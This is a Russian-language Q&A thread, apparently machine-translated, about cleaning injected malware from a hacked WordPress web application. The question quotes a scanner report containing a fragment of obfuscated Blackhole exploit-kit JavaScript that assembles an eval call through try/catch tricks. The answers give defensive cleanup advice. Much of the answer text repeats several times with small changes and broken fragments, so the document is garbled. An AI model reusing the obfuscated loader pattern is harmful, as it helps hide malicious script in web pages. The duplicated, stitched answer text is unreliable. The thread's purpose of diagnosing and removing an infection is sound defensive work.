Удаление вредоносного ПО из кода [дубликат]
Возможный дубликат:
Мой сервер взломан СРОЧНО
Мое веб-приложение было взломано и я пытаюсь удалить вредоносное ПО/инъекцию кода.
Сканирую его через http://sitecheck.sucuri.net и он говорит
Известное вредоносное ПО javascript.
Details: http://labs.sucuri.net/db/malware/malware-entry-mwexploitkitblackhole1?v20<script>v=window;try{dsfsd++}catch(wEGWEGWEg){try{(v+v)()}catch(fsebgreber){try{v["document"]["body"]="123"}catch(gds){m=123;if((alert+"").indexOf("native")!==-1)ev=window["e"+"val"];}}
Я искал в коде строки из вышеупомянутых Details типа "wEGWEGWEg" и "fsebgreber" с помощью grep, но ничего не нашел.
Просканировал приложение с помощью iscanner, и он обнаружил следующий удаленный источник.
[2.3] ((?:.*?)?) Обнаружен код Javascript из удаленного источника.
<script type="text/javascript" src="https://tq935.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=afde567bd5e0bd8d2b40870206901b9b"></script>
Нужна помощь для удаления инъекций кода.
Есть два распространенных сценария и 1 внешняя возможность ...
Вредоносный код был добавлен на страницы (и, скорее всего, был закодирован), поэтому он не будет прост. -текст и легко читаемый. Вам нужно будет найти какой-то текст из этого сценария и удалить его с этой страницы + выполнить поиск на всех других страницах.
Это атака с использованием SQL-инъекции, и вредоносный код / сценарий фактически находится в вашей базе данных SQL.
Код может быть добавлен в обоих местах.
Как предлагали другие, самым чистым, безопасным, не требующим практического вмешательства удалением было бы восстановление из чистой резервной копии (файлы базы данных и веб-сайта). Другой вариант, в зависимости от вашего опыта, - это очистить все вручную.
Чтобы выяснить, как произошла компрометация, потребуется время, но в первую очередь необходимо рассмотреть уязвимые сторонние скрипты / плагины, ваш собственный рукописный код, сценарии загрузки файлов / изображений и взломанная учетная запись пользователя. Я бы изменил ваши пароли для всех учетных записей, которые вы используете на сайте в качестве отправной точки. Я также подтверждаю, что вы используете последнюю версию WP, но, скорее всего, атака была вызвана одним из плагинов.
если вы хотите поработать над выяснением того, что произошло внедрение, и перед восстановлением сайта загрузите весь сайт / код и запустить его локально. Просто поймите, что вы используете взломанный веб-сайт / код на своем компьютере - поймите последствия. Существуют программы / сканеры оценки уязвимостей, а также фрилансеры, которые могут помочь найти потенциальные дыры на веб-сайте.
г измените свои пароли для всех учетных записей, которые вы используете на сайте в качестве отправной точки. Я также подтверждаю, что вы используете последнюю версию WP, но, скорее всего, атака была вызвана одним из плагинов.если вы хотите поработать над выяснением того, что произошло внедрение, и перед восстановлением сайта загрузите весь сайт / код и запустить его локально. Просто поймите, что на вашем компьютере запущен взломанный веб-сайт / код. Узнайте о возможных последствиях. Существуют программы / сканеры оценки уязвимостей, а также фрилансеры, которые могут помочь обнаружить потенциальные дыры на веб-сайте.
г измените свои пароли для всех учетных записей, которые вы используете на сайте в качестве отправной точки. Я также подтверждаю, что вы используете последнюю версию WP, но, скорее всего, атака была вызвана одним из плагинов.если вы хотите поработать над выяснением того, что произошло внедрение, и перед восстановлением сайта загрузите весь сайт / код и запустить его локально. Просто поймите, что на вашем компьютере запущен взломанный веб-сайт / код. Узнайте о возможных последствиях. Существуют программы / сканеры оценки уязвимостей, а также фрилансеры, которые могут помочь найти потенциальные дыры на веб-сайте.
, если вы хотите выяснить, произошло ли внедрение, и перед восстановлением сайта загрузите весь сайт / код и запустите его локально. Просто поймите, что на вашем компьютере запущен взломанный веб-сайт / код. Узнайте о возможных последствиях. Существуют программы / сканеры оценки уязвимостей, а также фрилансеры, которые могут помочь обнаружить потенциальные дыры на веб-сайте.
, если вы хотите выяснить, произошло ли внедрение, и перед восстановлением сайта загрузите весь сайт / код и запустите его локально. Просто поймите, что вы используете взломанный веб-сайт / код на своем компьютере - поймите последствия. Существуют программы / сканеры оценки уязвимостей, а также фрилансеры, которые могут помочь найти потенциальные дыры на веб-сайте.